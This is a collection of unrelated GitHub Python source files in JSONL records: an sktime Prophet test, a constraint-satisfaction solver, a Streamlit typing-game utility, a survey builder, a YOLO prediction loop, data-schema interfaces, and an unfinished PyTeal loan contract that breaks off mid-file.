+{"seq_id":"33997969700","text":"__author__ = [\"fkiraly\"]\n\nimport pandas as pd\nimport pytest\n\nfrom sktime.forecasting.fbprophet import Prophet\nfrom sktime.tests.test_switch import run_test_for_class\n\n\n@pytest.mark.skipif(\n not run_test_for_class(Prophet),\n reason=\"run test only if softdeps are present and incrementally (if requested)\",\n)\n@pytest.mark.parametrize(\"indextype\", [\"range\", \"period\"])\ndef test_prophet_nonnative_index(indextype):\n \"\"\"Check prophet with RangeIndex and PeriodIndex.\"\"\"\n y = pd.DataFrame({\"a\": [1, 2, 3, 4]})\n X = pd.DataFrame({\"b\": [1, 5, 3, 3, 5, 6], \"c\": [5, 5, 3, 3, 4, 2]})\n\n if indextype == \"period\":\n y.index = pd.period_range(\"2000-01-01\", periods=4)\n X.index = pd.period_range(\"2000-01-01\", periods=6)\n\n X_train = X.iloc[:4]\n X_test = X.iloc[4:]\n\n fh = [1, 2]\n\n f = Prophet()\n f.fit(y, X=X_train)\n y_pred = f.predict(fh=fh, X=X_test)\n\n if indextype == \"range\":\n assert pd.api.types.is_integer_dtype(y_pred.index)\n if indextype == \"period\":\n assert isinstance(y_pred.index, pd.PeriodIndex)\n\n\n@pytest.mark.skipif(\n not run_test_for_class(Prophet),\n reason=\"run test only if softdeps are present and incrementally (if requested)\",\n)\n@pytest.mark.parametrize(\"convert_to_datetime\", [False, True])\ndef test_prophet_period_fh(convert_to_datetime):\n \"\"\"Test Prophet with PeriodIndex based forecasting horizon, see issue #3537.\"\"\"\n from sktime.datasets import load_airline\n from sktime.forecasting.base import ForecastingHorizon\n\n y = load_airline()\n\n if convert_to_datetime:\n y = y.to_timestamp(freq=\"M\")\n\n fh_index = pd.PeriodIndex(pd.date_range(\"1961-01\", periods=36, freq=\"M\"))\n fh = ForecastingHorizon(fh_index, is_relative=False)\n\n forecaster = Prophet(\n seasonality_mode=\"multiplicative\",\n n_changepoints=int(len(y) / 12),\n add_country_holidays={\"country_name\": \"UnitedStates\"},\n yearly_seasonality=True,\n )\n\n forecaster.fit(y)\n\n y_pred = forecaster.predict(fh)\n\n assert len(y_pred) == len(fh_index)\n if convert_to_datetime:\n assert isinstance(y_pred.index, pd.DatetimeIndex)\n assert (y_pred.index == fh_index.to_timestamp()).all()\n else:\n assert isinstance(y_pred.index, pd.PeriodIndex)\n assert (y_pred.index == fh_index).all()\n","repo_name":"sktime/sktime","sub_path":"sktime/forecasting/tests/test_prophet.py","file_name":"test_prophet.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"71020551525","text":"import copy\nfrom typing import Generic, TypeVar, Dict, List, Set\n\nfrom constraints.Constraint import Constraint\nfrom heuristics.select_value import ValueSelector\nfrom heuristics.select_variable import VariableSelector\nfrom problem.forward_checking.DomainErasure import DomainErasure\n\nV = TypeVar('V')\nD = TypeVar('D')\n\n\nclass ConstraintSatisfactionProblem(Generic[V, D]):\n def __init__(self, variables: List[V], domains: Dict[V, Set[D]]):\n self.variables: List[V] = variables\n self.domains: Dict[V, Set[D]] = domains\n self.constraints: Dict[V, List[Constraint[V, D]]] = {}\n self.solutions = []\n self.visited_nodes = 0\n for variable in self.variables:\n self.constraints[variable] = []\n if variable not in self.domains:\n raise ValueError(\"Each variable should have a domain assigned to it\")\n\n def add_constraint(self, constraint: Constraint[V, D]):\n for variable in constraint.variables:\n if variable not in self.variables:\n raise ValueError(\"Such variable does not exist in domain\")\n self.constraints[variable].append(constraint)\n\n def consistent(self, variable: V, assignment: Dict[V, D]):\n for constraint in self.constraints[variable]:\n if not constraint.is_satisfied(assignment):\n return False\n return True\n\n def backtracking_search(self, assignment: Dict[V, D]):\n if len(assignment) == len(self.variables):\n self.solutions.append(assignment)\n return\n\n unassigned: List[V] = [v for v in self.variables if v not in assignment]\n\n to_be_assigned: V = unassigned[0]\n for value in self.domains[to_be_assigned]:\n local_assignment = assignment.copy()\n local_assignment[to_be_assigned] = value\n self.visited_nodes += 1\n if self.consistent(to_be_assigned, local_assignment):\n self.backtracking_search(local_assignment)\n\n def forward_checking(self, assignment: Dict[V, D], domains: Dict[V, Set[D]], domain_erasure: DomainErasure[V, D],\n variable_selector: VariableSelector[V, D], value_selector: ValueSelector[V, D]):\n if len(assignment) == len(self.variables):\n self.solutions.append(assignment)\n return\n\n unassigned: List[V] = [v for v in self.variables if v not in assignment]\n\n to_be_assigned: V = variable_selector.select(unassigned, domains)\n\n values = value_selector.select(list(domains[to_be_assigned]))\n\n for value in values:\n local_assignment = assignment.copy()\n local_assignment[to_be_assigned] = value\n self.visited_nodes += 1\n if self.consistent(to_be_assigned, local_assignment):\n\n domain_copy = copy.deepcopy(domains)\n\n if domain_erasure.erase(to_be_assigned, value, local_assignment, domain_copy):\n if self.consistent(to_be_assigned, local_assignment):\n self.forward_checking(local_assignment, domain_copy, domain_erasure, variable_selector,\n value_selector)\n","repo_name":"jakkoc/Constraint-Satisfaction-Problem","sub_path":"2/problem/ConstraintSatisfactionProblem.py","file_name":"ConstraintSatisfactionProblem.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42629168262","text":"'Importing required libraries'\n\nimport json\nimport streamlit as st\nfrom datetime import datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom essential_generators import DocumentGenerator\nfrom essential_generators import MarkovWordGenerator\nfrom essential_generators import MarkovTextGenerator\nimport numpy as np\nimport tqdm\nimport json\nimport re\nimport pickle\nimport keras\n\n\"\"\"\nIn this file we create the functions to log in and sign up. The users are registerd in a json composed by name and password.\nThe check is very easy and regulated by the variable light.\nWhen a user signed, also his historical is initialized. Every time the user plays, its stats are updated, apart of number of trials.\n\nAlso, this file contains all the external functions called in the game. Among them, there are the rankings and stats functions and deep learning text generation part.\n\"\"\"\n\n\ndef Authtentication(name, password):\n f = open('data/users.json') #open and load the json\n\n # returns JSON object as a dictionary\n data = json.load(f)\n\n if name in data.keys(): #check if the user exists\n if password == data[name][\"Password\"]: #check if the password is correct\n session_state = \"green\" #light green allows to go on on the app\n st.write(\"Welcome. Click Next to start playing!\")\n st.session_state.light = \"green\"\n st.session_state.Level = data[name][\"Level\"] #register the level\n st.session_state.Name = name\n\n else:\n st.write(\"Password incorrect!\") #light is still red here and the user can see the error\n\n else:\n st.write(\"Username not registered!\") #second condition error\n\n\n#This function takes name and password and register them in the json if they're not already there.\ndef Sign_up(name, password):\n f = open('data/users.json') #open and load the json data\n\n # returns JSON object as a dictionary\n data = json.load(f)\n\n\n\n\n if name in data.keys():\n st.write(\"User is already registered!\") #check if the user is already registered with the name\n\n else:\n data[\"{}\".format(name)] = {} #create a new nested key and fill the data\n data[\"{}\".format(name)][\"Password\"] = password\n data[\"{}\".format(name)][\"Level\"] = 1\n\n#<<<<<<< HEAD\n #data[\"{}\".format(name)][\"Registration date\"] = datetime.today().strftime('%Y-%m-%d')\n#=======\n#>>>>>>> f358277d (Interface bulding with most of the functionalities of the game. Also comments added per page.)\n st.write(\"Welcome to our Platform!. Click Next to start playing!\")\n st.session_state.light = \"green\" #you can go on\n st.session_state.Level = data[name][\"Level\"] #register the data\n st.session_state.Name = name\n\n with open(\"data/users.json\", \"w\") as fp:\n json.dump(data, fp) #update the json with the new user\n\n Historical = open('data/Historical.json')\n\n # returns JSON object as a dictionary\n Hist_data = json.load(Historical)\n\n\n #Initialization of the user historical data with default values\n Hist_data[\"{}\".format(name)] = {}\n Hist_data[\"{}\".format(name)][\"Level1\"] = [1000,0,0] #time,accuracy,attempts\n Hist_data[\"{}\".format(name)][\"Level2\"] = [1000,0,0]\n Hist_data[\"{}\".format(name)][\"Level3\"] = [1000, 0,0]\n\n with open(\"data/Historical.json\", \"w\") as fp:\n json.dump(Hist_data, fp)\n\n\n\n\n#This function create the ranking table. If a user is at level 3 then it's register only in the level 3, and same for level 2 and level 1 consequently.\ndef ranking(): #Ranking function\n jsonStr = open('data/Historical.json') #open and load data\n # returns JSON object as a dictionary\n jsonStr = json.load(jsonStr)\n\n for el in jsonStr.keys(): #iterate over users\n if (jsonStr[el][\"Level3\"][0]) != 1000: #check if the user has played this level\n jsonStr[el][\"Level3\"][0] = jsonStr[el][\"Level3\"][0] - jsonStr[el][\"Level2\"][0] #The speed is registered together for all levels. Then the speed of level x is the the speed of level x - speed of level x-1.\n\n #same for level 2\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n jsonStr[el][\"Level2\"][0] = jsonStr[el][\"Level2\"][0] - jsonStr[el][\"Level1\"][0]\n\n\n #register all the data of the speed. If the user played level 3, then is registered level 3 and its speed, and then for all the levels to create a rank.\n levels3 = []\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) != 1000: # take the peolpe that did the level 3\n levels3.append([el, jsonStr[el][\"Level3\"][0], 3])\n\n levels2 = []\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) == 1000:\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n levels2.append([el, jsonStr[el][\"Level2\"][0], 2])\n\n levels1 = []\n\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) == 1000:\n if (jsonStr[el][\"Level2\"][0]) == 1000:\n if (jsonStr[el][\"Level1\"][0]) != 1000:\n levels1.append([el, jsonStr[el][\"Level1\"][0], 1])\n\n #Create a dataframe\n df = pd.DataFrame(columns=[\"Name\", \"Level\", \"Time\"])\n\n #update the dataframe with all the levels\n for el in levels3:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n for el in levels2:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n for el in levels1:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n return df\n\n#Function Stats for the search bar. This function take the input of the user in the homepage and return stats about the speed, attempts.\ndef stats():\n jsonStr = open('data/Historical.json') #load json data\n # returns JSON object as a dictionary\n jsonStr = json.load(jsonStr)\n\n #number of users in the platform\n Usersl = []\n Users = 0\n for el in jsonStr.keys():\n Users += 1\n Usersl.append(Users)\n\n #if the user played one level(value is not default), append the corrisponding speed and then compute the average. This for each level.\n times_1 = []\n times_2 = []\n times_3 = []\n\n#Usual check of existence in the level by checking the default values.\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) != 1000:\n jsonStr[el][\"Level3\"][0] = jsonStr[el][\"Level3\"][0] - jsonStr[el][\"Level2\"][0]\n\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n jsonStr[el][\"Level2\"][0] = jsonStr[el][\"Level2\"][0] - jsonStr[el][\"Level1\"][0]\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level1\"][0] != 1000:\n times_1.append(jsonStr[el][\"Level1\"][0]) #list of speed\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level2\"][0] != 1000:\n times_2.append(jsonStr[el][\"Level2\"][0]) #list of speed\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level3\"][0] != 1000:\n times_3.append(jsonStr[el][\"Level3\"][0]) #list of speed\n\n times_1_l = [] #average lists to put inside the df\n times_2_l = []\n times_3_l = []\n\n times_1_l.append(sum(times_1) / len(times_1)) #average\n times_2_l.append(sum(times_2) / len(times_2))\n times_3_l.append(sum(times_3) / len(times_3))\n\n #compute the dataframe for speed\n df_Levels = pd.DataFrame()\n df_Levels[\"Users\"] = Usersl\n df_Levels[\"Level1\"] = times_1_l\n df_Levels[\"Level2\"] = times_2_l\n df_Levels[\"Level3\"] = times_3_l\n\n #For attemps is exactly the same\n attempt_1 = []\n attempt_2 = []\n attempt_3 = []\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level1\"][0] != 1000:\n attempt_1.append(jsonStr[el][\"Level1\"][2])\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level2\"][0] != 1000:\n attempt_2.append(jsonStr[el][\"Level2\"][2])\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level3\"][0] != 1000:\n attempt_3.append(jsonStr[el][\"Level3\"][2])\n\n attempt_1l = []\n attempt_2l = []\n attempt_3l = []\n\n attempt_1l.append(sum(attempt_1) / len(attempt_1))\n attempt_2l.append(sum(attempt_2) / len(attempt_2))\n attempt_3l.append(sum(attempt_3) / len(attempt_3))\n\n df_att = pd.DataFrame()\n df_att[\"Level1\"] = attempt_1l\n df_att[\"Level2\"] = attempt_2l\n df_att[\"Level3\"] = attempt_3l\n\n return (df_Levels,df_att) #0 and 1 output in the login page\n\n\n\ndef main_generator():\n '''\n Function that generates 3 dictionaries of sentences for the app.\n Output (json):\n 3 JSON files, each with 10 different sentences for the 3 levels of difficulty of the app.'''\n\n # Loading required data and model weights\n char2int = pickle.load(open(f\"data/wonderland.txt-char2int.pickle\", \"rb\"))\n int2char = pickle.load(open(f\"data/wonderland.txt-int2char.pickle\", \"rb\"))\n model = keras.models.load_model(f\"data/wonderland.txt-100.h5\")\n\n # Creating JSON file for the first level of difficulty of the game, with 10 sentences of 30 characters each.\n sen_level1 = sen_generator(30, 1, int2char, char2int, model)\n create_json(sen_level1, 'sen_level1')\n\n # Creating JSON file for the second level of difficulty of the game, with 10 sentences of 60 characters each.\n sen_level2 = sen_generator(60, 2, int2char, char2int, model)\n create_json(sen_level2, 'sen_level2')\n\n # Creating JSON file for the third level of difficulty of the game, with 10 sentences of 90 characters each.\n sen_level3 = sen_generator(90, 3, int2char, char2int, model)\n create_json(sen_level3, 'sen_level3')\n\n\ndef create_json(dict, name):\n '''\n Function to create a JSON file and save it in the data folder.\n Parameters:\n dict (dictionary): Includes the sentences generated as keys and the levels they correspond to as values.\n name (string): Name of the JSON file to be created.\n Output (json):\n JSON file generated and saved in the data folder.'''\n\n jsonString = json.dumps(dict)\n jsonFile = open(\"data/{}.json\".format(name), \"w\")\n jsonFile.write(jsonString)\n jsonFile.close()\n\ndef seed_generator():\n '''\n Function to generate a sentence using the Markov generator, transform it to lowercase and remove any punctuation marks from it.\n Output:\n seed (string): Sentence from the Markov generator without punctuation marks and in lowercase.'''\n\n gen = DocumentGenerator(text_generator=MarkovTextGenerator(), word_generator=MarkovWordGenerator())\n seed = str.lower(gen.sentence())\n seed = re.sub(r'[^\\w\\s]', '', seed)\n return seed\n\ndef sen_generator(n_chars, l, int2char, char2int, model):\n '''\n Funtion that generates a dictionary of 10 sentences for the app.\n\n Parameters:\n n_chars (int): Amount of characters requires for the generation of a sentence.\n l (int): Level of difficulty from the app to which the generated sentences correspond to.\n int2char (dict pickle file): Dictionary with characters from data source (book) converted to integers.\n char2int (dict pickle file): Dictionary with integers from data source (book) converted to characters.\n model (h5 file): File that contains the saved loaded weights of the model developed in the python notebook from the repository.\n\n Output:\n dict_sentences (dict): Dictionary of 10 sentences generated as keys and the level of difficulty (l) from the parameters as values.'''\n\n vocab_size = len(char2int)\n sequence_length = 100\n seed = seed_generator()\n sentences = []\n for i in range(0, 10):\n generated = \"\"\n for i in tqdm.tqdm(range(n_chars), \"Generating text\"):\n # Creating the input sequence\n X = np.zeros((1, sequence_length, vocab_size))\n for t, char in enumerate(seed):\n X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1\n # Predicting the next character.\n predicted = model.predict(X, verbose=0)[0]\n # Converting the vector to an integer.\n next_index = np.argmax(predicted)\n # Converting the integer to a character.\n next_char = int2char[next_index]\n # Adding the character to results 'generated'.\n generated += next_char\n # Shifting seed and the predicted character.\n seed = seed[1:] + next_char\n # Removing '\\' symbol.\n generated = re.sub(r'\\n', '', generated)\n sentences.append(generated)\n # Creating another seed for the next sentence.\n seed = seed_generator()\n # Converting list of 10 sentences into a dictionary.\n dict_sentences = {sentences[0]: 1}\n for i in sentences:\n dict_2 = {i: l}\n dict_sentences.update(dict_2)\n return dict_sentences\n\n\n\n","repo_name":"fabriziorocco/Typy-App","sub_path":"apps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11652777232","text":"from sql_manager import get_survey_versions, get_question_versions, get_questions, get_surveys, get_questions_by_survey, insert_survey_version, insert_survey, insert_question_version, insert_question, insert_survey_question\nfrom menu import do_menu, get_int_response, get_str_response\nfrom util import get_items_of_index\n\nclass Survey_Builder:\n def __init__(self):\n self.__question_type = ['MultipleChoice', 'FillInTheBlank', 'MultipleChoiceRadio', 'Disabler']\n self.__initial_options = ['Create Survey', 'Create Questions', 'Modify Survey']\n self.__survey_version_id = -1\n self.__survey_id = -1\n self.__last_survey_question_id = -1\n self.__total_survey = {}\n self.__last_question_id = -1\n self.__categories = []\n self.__current_survey_version_description = \"\"\n self.__current_survey_version_name = \"\"\n self.__current_question_version_name = \"\" \n\n def begin(self):\n val = do_menu(\"What would you like to do (-1 for quitting) \", self.__initial_options)\n if(val == 0):\n self.create_survey()\n self.add_questions_to_survey()\n else:\n self.goodbye()\n\n\n def create_survey(self, dont_use = \"\"):\n survey_items_total = get_survey_versions()\n survey_items = get_items_of_index(survey_items_total, 1)\n val = do_menu(\"What survey version would you like to base this off of (-1 for making new survey version) \", survey_items)\n if val == -1:\n self.__survey_version_id = self.create_survey_version()\n else:\n self.__survey_version_id = survey_items_total[val][0]\n self.__current_survey_version_name = survey_items_total[val][1]\n self.__current_question_version_description = survey_items_total[val][2]\n\n ret_val= -1\n while(ret_val == -1):\n print(\"Now to make the actual survey; (-1 to use same) \")\n survey_name = input(\"Give a survey name \")\n if survey_name == \"-1\":\n survey_name = self.__current_survey_version_name\n description = self.__current_survey_version_description\n ret_val = insert_survey(survey_name, description, self.__survey_version_id)\n else: \n description = input(\"Give a survey description \")\n ret_val = insert_survey(survey_name, description, self.__survey_version_id)\n self.__survey_id = ret_val\n return ret_val\n\n\n\n def create_survey_version(self):\n ret_val = -1\n survey_name = \"\"\n description = \"\"\n while ret_val == -1:\n survey_name = input(\"Give a survey name \")\n description = input(\"Give a survey description \")\n ret_val = insert_survey_version(survey_name, description)\n print(ret_val)\n self.__current_survey_version_name = survey_name\n self.__current_question_version_description = description\n return ret_val\n\n\n def add_questions_to_survey(self):\n val = -1\n while val != -2:\n questions = get_questions()\n val = do_menu(\"Choose a question to add (-1 for new questions -2 to finish) \", questions, -2)\n if(val == -1):\n self.create_question_version()\n elif(val >= 0):\n self.add_question(questions[val])\n\n\n def create_question_version(self):\n question_versions = get_question_versions()\n question_version_names = get_items_of_index(question_versions, 1)\n val = do_menu(\"Choose a question version (-1 to make a new one) \", question_version_names)\n question_version_id = -1\n if(val == -1):\n while question_version_id == -1:\n version_name = input(\"What do you want to name your question? \")\n self.__current_question_version_name = version_name\n question_version_id = insert_question_version(version_name)\n else:\n question_version_id = question_versions[val][0]\n self.__current_question_version_name = question_versions[val][1]\n\n self.create_question(question_version_id)\n\n \n def create_question(self, question_version_id):\n response_id = -1\n while response_id == -1:\n question = input(\"What is the prompt for your question? (-1 for same)\")\n if question == \"-1\":\n question = self.__current_question_version_name\n question_type = self.__question_type[do_menu(\"What type of question \", self.__question_type, 0)]\n health_data = True if do_menu(\"Is there sleep data? \", [\"No\", \"Yes\"], False) == 1 else False\n answer = []\n key = 0\n if input(\"Would you like your answers to just be Yes / No? (y is you want this)\") == 'y':\n answer = ['Yes', 'No']\n else:\n while key != \"-1\":\n key = input(\"Provide a value \")\n answer.append(key)\n if input(f\"You are going to insert a questions {question} with answer {answer} with type {question_type} and health data {health_data} are you sure (-1 for no)\") == \"-1\":\n continue\n response_id = insert_question(question, str(answer), question_type, question_version_id, health_data) \n \n def add_question(self, val):\n survey_id = self.__survey_id\n question_id = val[0]\n last_question = self.__last_question_id\n category = \"\"\n category_num = do_menu(\"Pick a category (-1 to make new category) \", self.__categories)\n if(category_num == -1):\n self.__categories.append(input(\"Make a new category \"))\n category = self.__categories[-1]\n else:\n category = self.__categories[category_num]\n if input(f\"Are you sure you want to add question to survey {survey_id}, {question_id}, {last_question}, {category}? (-1 to not)\") == \"-1\":\n return\n self.__last_question_id = insert_survey_question(survey_id, question_id, last_question, category)\n\n \n def goodbye(self):\n print(\"Closing\")\n\n \n ","repo_name":"Greenman23/Psychology-Survey-App","sub_path":"data_insertion/survey_builder.py","file_name":"survey_builder.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39453061134","text":"import os\nimport math\nimport numpy as np\nimport time\n\ndef is_inp(name):\n return name[-4:] in ['.jpg','.JPG', '.jpeg', '.JPEG', '.png', '.PNG']\n\ndef predict(self):\n inp_path = self.hyperparameters.test\n all_inps = os.listdir(inp_path)\n all_inps = [i for i in all_inps if is_inp(i)]\n if not all_inps:\n msg = 'Failed to find any test files in {} .'\n exit('Error: {}'.format(msg.format(inp_path)))\n\n batch = min(self.hyperparameters.batch_size, len(all_inps))\n\n # predict in batches\n n_batch = int(math.ceil(len(all_inps) / batch))\n for j in range(n_batch):\n from_idx = j * batch\n to_idx = min(from_idx + batch, len(all_inps))\n\n # collect images input in the batch\n inp_feed = list(); new_all = list()\n this_batch = all_inps[from_idx:to_idx]\n for inp in this_batch:\n new_all += [inp]\n this_inp = os.path.join(inp_path, inp)\n this_inp = self.preprocess(this_inp)\n expanded = np.expand_dims(this_inp, 0)\n inp_feed.append(expanded)\n this_batch = new_all\n\n # Feed to the net\n feed_dict = {self.layers['input'] : np.concatenate(inp_feed, 0)}\n # self.say('Forwarding {} inputs ...'.format(len(inp_feed)))\n start = time.time()\n out = self.sess.run(self.layers['output'], feed_dict)\n stop = time.time(); last = stop - start\n # self.say('Total time = {}s / {} inps = {} ips'.format(\n # last, len(inp_feed), len(inp_feed) / last))\n\n\n # Post processing\n # self.say('Post processing {} inputs ...'.format(len(inp_feed)))\n start = time.time()\n for i, prediction in enumerate(out):\n # print str(i)\n # for j in prediction:\n # print j\n\n self.postprocess(prediction,\n os.path.join(inp_path, this_batch[i]))\n stop = time.time(); last = stop - start\n\n # Timing\n # self.say('Total time = {}s / {} inps = {} ips'.format(\n # last, len(inp_feed), len(inp_feed) / last))\n","repo_name":"iRiisH/yolo","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38359065129","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom typing import TypeVar, Generic\n\nT_co = TypeVar('T_co', covariant=True)\n\n\nclass IDataContainer(ABC, Generic[T_co]):\n \"\"\"\n A structures carrying data between processing stages\n \"\"\"\n\n @property\n @abstractmethod\n def data(self) -> T_co:\n \"\"\"\n :return: Primary datastructure stored in this container\n \"\"\"\n ...\n\n @abstractmethod\n def deep_copy(self) -> IDataContainer[T_co]:\n ...\n\n\nclass ISchemaAcceptor(ABC):\n \"\"\"\n Scheme for data that is expected as input for a function\n \"\"\"\n\n @abstractmethod\n def accepts(self, output_data_scheme: IDataSchema) -> bool:\n \"\"\"Assess whether this scheme would accept the other data scheme as input.\n\n If the schemes are incompatible, the function may either raise an exception containing further details on why the\n other data scheme is not accepted as input or just return ``False``\n\n :raise DataSchemeCompatibilityError: If the data schemes are not compatible and further details are available\n :param output_data_scheme: Output data scheme to check for compatibility\n :return: ``True`` if the output data scheme is accepted as input, ``False`` otherwise\n \"\"\"\n ...\n\n\nclass IDataSchema(ISchemaAcceptor, ABC):\n \"\"\"\n Scheme for data that is produced by a function.\n \"\"\"\n\n @abstractmethod\n def validate(self, data_container: IDataContainer) -> bool:\n \"\"\"Validates that a data container fits this scheme.\n\n If this is not the case, the function may either raise an exception containing further details on why the validation\n failed or just return ``False``\n :raise DataSchemeConformityError: If the schemes are not compatible to each other and detailed information is available\n :param data_container: Data container to validate\n :return: ``True`` if the data container conforms to this scheme, ``False`` otherwise.\n \"\"\"\n ...\n","repo_name":"Digital-C-Fiber/openMNGlab","sub_path":"openmnglab/model/datamodel/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20350174085","text":"from pyteal import *\nfrom pyteal.ast.bytes import Bytes\nfrom pyteal_helpers import program\n\n\ndef approval():\n # globals\n balance = Bytes(\"balance\")\n start_date = Bytes(\"start_date\")\n end_date = Bytes(\"end_date\")\n interest_rate = Bytes(\"interest_rate\")\n loan_amount = Bytes(\"loan_amount\")\n beneficiary_address = Bytes(\"beneficiary\")\n beneficiary_stake = Bytes(\"beneficiary_stake\")\n reserve_address = Bytes(\"reserve_address\")\n # admin_address = Bytes(\"admin_address\")\n agent_address = Bytes(\"agent_address\"),\n assetId = Bytes(\"agent_address\")\n pool_address = Bytes(\"pool_address\")\n staked_tokens = Bytes(\"staked_tokens\")\n\n # scratch_space\n\n accounts_length = ScratchVar(TealType.uint64)\n backers_length = ScratchVar(TealType.uint64)\n\n\n # finished, needs testing\n @Subroutine(TealType.uint64)\n def check_txn_conditions(idx:Expr):\n return Seq(\n # program.check_rekey_zero()\n \n And(\n Gtxn[idx].type_enum() == TxnType.AssetTransfer,\n # App.optedIn(transaction.asset_sender(), Global.current_application_id()),\n Gtxn[idx].asset_receiver() == Global.current_application_address(),\n Gtxn[idx].asset_close_to() == Global.zero_address(),\n )\n \n )\n\n # Incomplete, needs testing\n @Subroutine(TealType.uint64)\n def pre_assertions():\n idx = ScratchVar(TealType.uint64)\n backer_end_idx = ScratchVar(TealType.uint64)\n return Seq(\n Assert(\n And(\n Global.group_size() > Int(2),\n Gtxn[1].asset_amount() > Int(1),\n\n )\n ),\n\n accounts_length.store(Global.group_size()),\n App.globalPut(beneficiary_stake, Gtxn[0].asset_amount()),\n App.globalPut(beneficiary_address, Gtxn[0].asset_sender()), \n backer_end_idx.store(accounts_length.load()),\n If(check_txn_conditions(Int(0)) == Int(0))\n .Then(\n Seq( \n For(idx.store(Int(4)), idx.load() <= backer_end_idx.load(), idx.store(idx.load() + Int(1)))\n .Do( \n If(check_txn_conditions(idx.load()) == Int(0))\n .Then(\n # tally the staked tokens,\n Seq(\n App.globalPut(staked_tokens, App.globalGet(Bytes(\"staked_tokens\")) + Gtxn[idx.load()].asset_amount()),\n Continue()\n )\n )\n .Else(\n Seq(\n Reject()\n )\n \n )\n \n ),\n # check if points match loan amount\n If(App.globalGet(Bytes(\"staked_tokens\")) != App.globalGet(Bytes(\"loan_amount\")))\n .Then(\n Seq(\n Return(Int(0))\n )),\n\n Return(Int(1))\n )\n\n \n )\n .Else(\n Return(Int(0))\n )\n )\n\n\n\n @Subroutine(TealType.none)\n def payment():\n return Seq(\n # run custom logic\n #TODO:: Check if agent address has the required amount\n #make sure balance doesnt go below zero\n Assert(Btoi(Txn.application_args[1]) <= App.globalGet(balance)),\n #move USDCa from agent to pool address\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields(\n {\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_receiver: App.globalGet(Bytes(\"pool_address\")),\n TxnField.asset_amount: Btoi(Txn.application_args[1]), #amount\n TxnField.xfer_asset: Txn.assets[0],\n TxnField.asset_sender: Txn.sender() #agent address\n }\n ),\n InnerTxnBuilder.Submit(),\n #reduce balance\n App.globalPut(Bytes(\"balance\"), App.globalGet(Bytes(\"balance\")) - Btoi(Txn.application_args[1])),\n )\n\n # expressions\n force_close = Seq(\n # run custom logic\n Approve(),\n )\n\n register_agent = Seq(\n # App.globalPut(agent_address, Txn.accounts[1]),\n Approve()\n )\n\n \n check_default = Seq(\n # run custom logic\n Approve(),\n )\n\n handle_creation = Seq(\n #TODO: CHECK if args are valid\n\n App.globalPut(loan_amount, Txn.application_args[1]),\n App.globalPut(interest_rate, Txn.application_args[2]),\n App.globalPut(start_date, Txn.application_args[3]),\n App.globalPut(end_date, Txn.application_args[4]),\n App.globalPut(reserve_address, Txn.application_args[5]),\n App.globalPut(pool_address, Txn.application_args[6]),\n # App.globalPut(assetId, \"get assettid from --foreign-asset arg\"),\n\n Approve()\n )\n\n #needs testing\n @Subroutine(TealType.none)\n def initialize_loan():\n return Seq(\n If(pre_assertions() == Int(1))\n .Then(\n Seq(\n Reject()\n )\n ),\n #update loan balance\n App.globalPut(balance, App.globalGet(Bytes(\"loan_amount\"))+ (App.globalGet(Bytes(\"loan_amount\")) * (App.globalGet(Bytes(\"interest_rate\"))/Int(100)))),\n # move USDCa to agent address\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields(\n {\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_receiver: App.globalGet(Bytes(\"agent_address\")),\n TxnField.asset_amount: App.globalGet(Bytes(\"loan_amount\")),\n TxnField.xfer_asset: Txn.assets[0],\n TxnField.asset_sender: App.globalGet(Bytes(\"pool_address\"))\n }\n ),\n InnerTxnBuilder.Submit(),\n\n # Approve()\n )\n \n \n\n return program.event(\n init=handle_creation,\n opt_in=Seq(\n Cond(\n [Txn.application_args[0] == Bytes(\"register_agent\"), register_agent],\n ),\n Approve()\n ),\n\n no_op=Seq(\n Cond(\n [Txn.application_args[0] == Bytes(\"apply\"), initialize_loan()],\n [Txn.application_args[0] == Bytes(\"payment\"), payment()],\n [Txn.application_args[0] == Bytes(\"force_close\"), force_close],\n [Txn.application_args[0] == Bytes(\"check_default\"), check_default]\n ),\n Reject()\n )\n\n )\n\n\ndef clear():\n return 